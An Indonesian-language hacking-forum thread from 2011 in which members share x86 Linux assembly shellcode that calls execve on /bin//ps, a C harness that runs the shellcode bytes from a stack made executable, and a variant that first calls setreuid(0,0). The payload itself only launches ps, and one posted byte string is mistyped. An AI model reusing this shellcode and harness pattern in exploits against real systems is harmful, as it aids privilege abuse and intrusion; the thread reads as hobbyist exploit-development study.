Threaded Mode | Linear Mode

ev1lut10n · 09-30-2011, 04:45 AM

Code:

;by: ev1lut10n

global _start

_start:

 xor eax,eax ;reset eax ke 0

 push eax ; siapkan stack frame

 push 0x73702f2f  ; sp//

 push 0x6e69622f   ; nib/

 mov ebx, esp 

 mov eax, 11

 int 80h

compile:
nasm -f elf ps.asm
ld -o ps ps.o

.

tridi · 09-30-2011, 05:20 AM

bisa dijelasin dikit ga kang?

darkslayer · 09-30-2011, 01:08 PM

buat apa nih kang?
kgk bs baca assembly suram

konspirasi · 09-30-2011, 01:38 PM

ini shellcode buat di OS apa bro? yg pasti x86 kan..

syahrini · (This post was last modified: 10-01-2011 12:40 AM by syahrini.)

Segmentaion fault om smangat

tapi setelah ane jadiin shellcode dan di kasih c source

Code:

syahrini@sesuatubanget:~$ objdump -d ps

o:     file format elf32-i386

Disassembly of section .text:

08048060 <_start>:

 8048060:    31 c0                    xor    %eax,%eax

 8048062:    50                          push   %eax

 8048063:    68 2f 0f 72 73           push   $0x73720f2f

 8048068:    68 2f 62 69 6e           push   $0x6e69622f

 804806d:    89 e3                    mov    %esp,%ebx

 804806f:    b8 0b 00 00 00           mov    $0xb,%eax

 8048074:    cd 80                    int    $0x80

Quote:#include <unistd.h>
char shellcode[]="\x31\xc0\x50\x68\x2f\x0f\x72\x73\x68\x2f\x62\x69\x6e"
"\x89\xe3\xb8\x0b\x00\x00\x00\xcd\x80";
int main(int argc, char *arg[])
{
/*function pointer*/
int (*funct)();
funct = (int(*)())shellcode;
(int)(*funct)();
return 0;
}

Code:

[syahrini@sesuatubanget]$ gcc -g ps.c -o ps

    [syahrini@sesuatubanget]$ execstack -s ps

    [syahrini@sesuatubanget]$ ./ps

    [syahrini@sesuatubanget]$ echo $?

    1

om evilution unyu-unyu

**syn_attack** · 10-01-2011, 07:42 AM

mas ev1lut10n ~# keyen mas.... :-)

konspirasi · 10-01-2011, 08:01 AM

owh, klo pake nasm segmentation faultm klo dijadiin c bisa, manteb om ketawa

**syn_attack** · 10-18-2011, 04:10 PM

kak ev1lut10n ~# mau ikut nambahin aja kak...

; execve("/bin//ps", "/bin//ps", NULL)
; Programmer : Paulus Gandung Prakosa_ (0x1337day)
;

section .text

global _start

_start :

; setreuid(0, 0)
xor eax, eax
xor ebx, ebx
push eax
push ebx
mov ecx, esp
mov al, 0x46
int 0x80

; execve("/bin//ps", "/bin//ps", NULL)
xor eax, eax
push eax
push 0x73702f2f
push 0x6e69622f
mov ebx, esp
xor ecx, ecx
push ecx
push ebx
mov edx, esp
mov al, 0xb
int 0x80

; _exit(0)
xor eax, eax
push eax
mov ebx, esp
mov al, 0x1
int 0x80

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	[POC] sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL)	syn_attack	21	2,533	10-25-2011 03:34 AM Last Post: syn_attack
	Membuat shellcode di Freebsd 8.2	mywisdom	4	1,028	07-20-2011 11:00 AM Last Post: Liyan oz